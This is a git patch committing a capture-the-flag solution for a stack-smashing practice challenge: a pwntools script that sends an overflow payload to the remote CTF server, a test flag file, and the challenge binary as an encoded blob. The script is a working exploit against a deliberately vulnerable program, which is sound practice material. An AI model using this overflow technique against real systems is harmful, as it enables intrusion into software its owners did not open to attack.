From b513584f36fda5e689061e61b527f04562090457 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Wed, 8 Sep 2021 11:40:48 +0800
Subject: [PATCH] Finished canary/smash-the-stack

---
 canary/smash-the-stack/answer.py       |  17 +++++++++++++++++
 canary/smash-the-stack/flag            |   1 +
 canary/smash-the-stack/smash-the-stack | Bin 0 -> 7532 bytes
 3 files changed, 18 insertions(+)
 create mode 100644 canary/smash-the-stack/answer.py
 create mode 100644 canary/smash-the-stack/flag
 create mode 100755 canary/smash-the-stack/smash-the-stack

diff --git a/canary/smash-the-stack/answer.py b/canary/smash-the-stack/answer.py
new file mode 100644
index 0000000..36eb079
--- /dev/null
+++ b/canary/smash-the-stack/answer.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7717)
+#p = process('./smash-the-stack')
+elf = ELF('./smash-the-stack')
+
+buff_bss = elf.sym['buff']
+
+payload = 0xbc*'a' + p32(buff_bss)
+p.sendline(payload)
+
+p.interactive()
diff --git a/canary/smash-the-stack/flag b/canary/smash-the-stack/flag
new file mode 100644
index 0000000..f4e4fb8
--- /dev/null
+++ b/canary/smash-the-stack/flag
@@ -0,0 +1 @@
+flag{this-is-a-test-flag-this-is-a-test-flag}
diff --git a/canary/smash-the-stack/smash-the-stack b/canary/smash-the-stack/smash-the-stack
new file mode 100755
index 0000000000000000000000000000000000000000..7f5d7807b986f2af199c2f29ed2784d17d52b1cf
GIT binary patch
literal 7532
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

literal 0
HcmV?d00001